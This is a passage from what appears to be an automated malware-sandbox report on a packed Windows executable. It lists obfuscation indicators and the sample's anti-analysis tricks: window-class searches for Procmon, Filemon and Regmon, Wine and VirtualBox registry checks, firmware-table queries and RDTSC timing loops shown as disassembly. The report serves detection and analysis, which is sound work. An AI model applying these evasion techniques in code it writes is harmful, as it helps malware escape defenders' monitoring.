          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: file.exeStatic file information: File size 1852416 > 1048576
          Source: file.exeStatic PE information: Raw size of prornizb is bigger than: 0x100000 < 0x19a600

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.960000.0.unpack :EW;.rsrc:W;.idata :W; :EW;prornizb:EW;bkfftptq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;prornizb:EW;bkfftptq:EW;.taggant:EW;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: file.exeStatic PE information: real checksum: 0x1d3981 should be: 0x1c7704
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: prornizb
          Source: file.exeStatic PE information: section name: bkfftptq
          Source: file.exeStatic PE information: section name: .taggant
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585392 push edx; retf 0_3_055853A9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: file.exeStatic PE information: section name: entropy: 7.977505472489843
          Source: file.exeStatic PE information: section name: prornizb entropy: 7.953536728834796

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37D9A second address: B37DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F17414E33F6h 0x0000000a pop edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DA5 second address: B37DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE87h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DC3 second address: B37DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DCC second address: B37DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BD70 second address: B3BD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BD8F second address: B3BD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE04 second address: B3BE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE08 second address: B3BE58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F174075FE78h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 cmc 0x00000023 push 00000000h 0x00000025 call 00007F174075FE81h 0x0000002a mov dx, di 0x0000002d pop esi 0x0000002e push C2E82C10h 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F174075FE7Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE58 second address: B3BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE5C second address: B3BEC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007F174075FE76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D17D470h 0x00000013 sbb cl, FFFFFFC7h 0x00000016 push 00000003h 0x00000018 call 00007F174075FE88h 0x0000001d mov edx, dword ptr [ebp+122D37CEh] 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 mov edx, ecx 0x00000028 push 00000003h 0x0000002a sub dword ptr [ebp+122D3449h], edx 0x00000030 call 00007F174075FE79h 0x00000035 jmp 00007F174075FE85h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007F174075FE76h 0x00000045 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BEC8 second address: B3BEE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BEE5 second address: B3BEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F174075FE76h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BFFA second address: B3BFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BFFE second address: B3C049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 00D7E830h 0x0000000e mov ecx, dword ptr [ebp+122D34C6h] 0x00000014 push 00000003h 0x00000016 or cl, 00000017h 0x00000019 push 00000000h 0x0000001b mov edi, 387DA5BCh 0x00000020 push 00000003h 0x00000022 mov cx, C4A7h 0x00000026 push AA6DBDD8h 0x0000002b jc 00007F174075FE96h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F174075FE88h 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C22F second address: B5C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C235 second address: B5C239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C239 second address: B5C274 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17414E33F6h 0x00000008 jmp 00007F17414E33FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F17414E33F8h 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007F17414E33FAh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jg 00007F17414E33F6h 0x00000029 jl 00007F17414E33F6h 0x0000002f popad 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C274 second address: B5C279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27DB1 second address: B27DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A5E4 second address: B5A5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jno 00007F174075FE76h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A5FD second address: B5A603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A73C second address: B5A740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A89C second address: B5A8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB64 second address: B5AB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB68 second address: B5AB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB6C second address: B5AB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ACE7 second address: B5ACFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F17414E33FBh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ACFC second address: B5AD2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F174075FE87h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD2D second address: B5AD31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AEAA second address: B5AEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AEAF second address: B5AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B2F5 second address: B5B2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA4D second address: B5BA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA52 second address: B5BA95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE85h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F174075FE85h 0x0000000e jmp 00007F174075FE85h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA95 second address: B5BAB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4F16D second address: B4F175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E23F second address: B5E243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E243 second address: B5E247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E842 second address: B5E849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D068 second address: B5D06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29823 second address: B29827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29827 second address: B2984F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F174075FE83h 0x0000000f jns 00007F174075FE78h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B40 second address: B66B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B34D second address: B2B351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65F38 second address: B65F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17414E33F6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65F42 second address: B65F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6621C second address: B66220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66220 second address: B66237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F174075FE7Fh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B663B3 second address: B663BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6699A second address: B6699E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6699E second address: B669A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669A2 second address: B669AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669AA second address: B669B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669B0 second address: B669EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F174075FE88h 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 je 00007F174075FE76h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b jmp 00007F174075FE80h 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F17 second address: B67F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jne 00007F17414E33FCh 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007F17414E340Dh 0x0000001d jmp 00007F17414E3407h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17414E3402h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F7D second address: B67F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F82 second address: B67FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F17414E33F8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D35E2h] 0x0000002d push 1A44D22Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F17414E3409h 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B682F7 second address: B682FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C0C second address: B68C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C10 second address: B68C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68CB7 second address: B68CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A0AB second address: B6A10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jnc 00007F174075FE88h 0x0000000d nop 0x0000000e pushad 0x0000000f or bx, 4F67h 0x00000014 mov edx, dword ptr [ebp+122D366Ah] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d or dword ptr [ebp+122D3449h], ecx 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 mov dword ptr [ebp+122D17DEh], ecx 0x0000002c pop esi 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F174075FE89h 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jbe 00007F174075FE76h 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BD02 second address: B6BD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BAE9 second address: B6BAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71586 second address: B71592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C47B second address: B6C496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 je 00007F174075FE76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F174075FE76h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71592 second address: B71597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C496 second address: B6C4A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B1A second address: B71B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B1E second address: B71B4C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F174075FE80h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B4C second address: B71B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D33CFh], edx 0x0000000c mov bx, 4F86h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D33F0h], eax 0x00000018 push 00000000h 0x0000001a adc di, B989h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B72 second address: B71B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F174075FE80h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BD3 second address: B72BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3404h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C8F second address: B73C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F174075FE76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D79 second address: B71D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
